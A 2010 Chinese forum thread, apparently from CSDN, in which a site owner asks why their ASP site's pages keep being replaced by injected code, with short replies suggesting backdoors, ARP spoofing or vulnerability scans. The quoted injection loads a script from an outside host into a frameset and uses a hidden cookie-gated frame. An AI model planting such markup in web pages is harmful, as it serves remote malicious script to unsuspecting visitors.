9,506
社区成员
发帖
与我相关
我的任务
分享网页被挂马了
<html>
<head>
</head>
<script src="http://www.chaoguqu.com/plus/v6.js"></script>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/?updatedata=index">
<frame name="hi" src="">
</frameset>
< ml>
部分页面会被串改成以上的代码,并非是在顶部尾部添加,而是整个html代码被替换。而是有时候会替换有时候不会替换。
网站是windows2008+asp的。
服务器全部格式化,重新安装系统,依然有病毒。
绑定网关mac地址,并且arp-a 也无任何可以IP。
该用的方法都用了,谁还能提供解决方案?
<head>
</head>
<script src="http://www.chaoguqu.com/plus/v6.js"></script>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/?updatedata=index">
<frame name="hi" src="">
</frameset>
< ml>
部分页面会被串改成以上的代码,并非是在顶部尾部添加,而是整个html代码被替换。而是有时候会替换有时候不会替换。
网站是windows2008+asp的。
服务器全部格式化,重新安装系统,依然有病毒。
绑定网关mac地址,并且arp-a 也无任何可以IP。
该用的方法都用了,谁还能提供解决方案?
...全文
请发表友善的回复…
发表回复
j8i4a2n6 2010-12-13
- 打赏
- 举报
用iiscan查看漏洞。。。。
fanshenggen 2010-04-21
- 打赏
- 举报
好好学习天天说向上
xiaobaomeng 2010-04-21
- 打赏
- 举报
难道是引导区里也有
xiaobaomeng 2010-04-21
- 打赏
- 举报
服务器全部格式化,重新安装系统,依然有病毒。?
randycheng999 2010-04-13
- 打赏
- 举报
学习至上
dayadream 2010-04-13
- 打赏
- 举报
http://www.chaoguqu.com
这个站是你的?
检查你的网站程序中存在的后门 我想你每次格盘 肯定会打包自己的网站程序吧? 而后门恰恰就在网站程序中。也是一个asp或者jsp 或者php的文件。。仔细检查 删除之 然后修复网站漏洞
这个站是你的?
检查你的网站程序中存在的后门 我想你每次格盘 肯定会打包自己的网站程序吧? 而后门恰恰就在网站程序中。也是一个asp或者jsp 或者php的文件。。仔细检查 删除之 然后修复网站漏洞
webo0724 2010-04-12
- 打赏
- 举报
先查查网站服务器上有没有毒。
zhijie284 2010-04-12
- 打赏
- 举报
局域网的某机器可能中标了……
cnicc 2010-04-12
- 打赏
- 举报
你去别的机器arp -a看看
双黑in上海 2010-04-10
- 打赏
- 举报
网站改成非80端口就没事。换回80端口,页面就出现问题。
服务器所有防火墙都装了,补丁也全部升级了。
服务器所有防火墙都装了,补丁也全部升级了。
aleyn 2010-04-10
- 打赏
- 举报
没怎么明白
双黑in上海 2010-04-10
- 打赏
- 举报
没人????
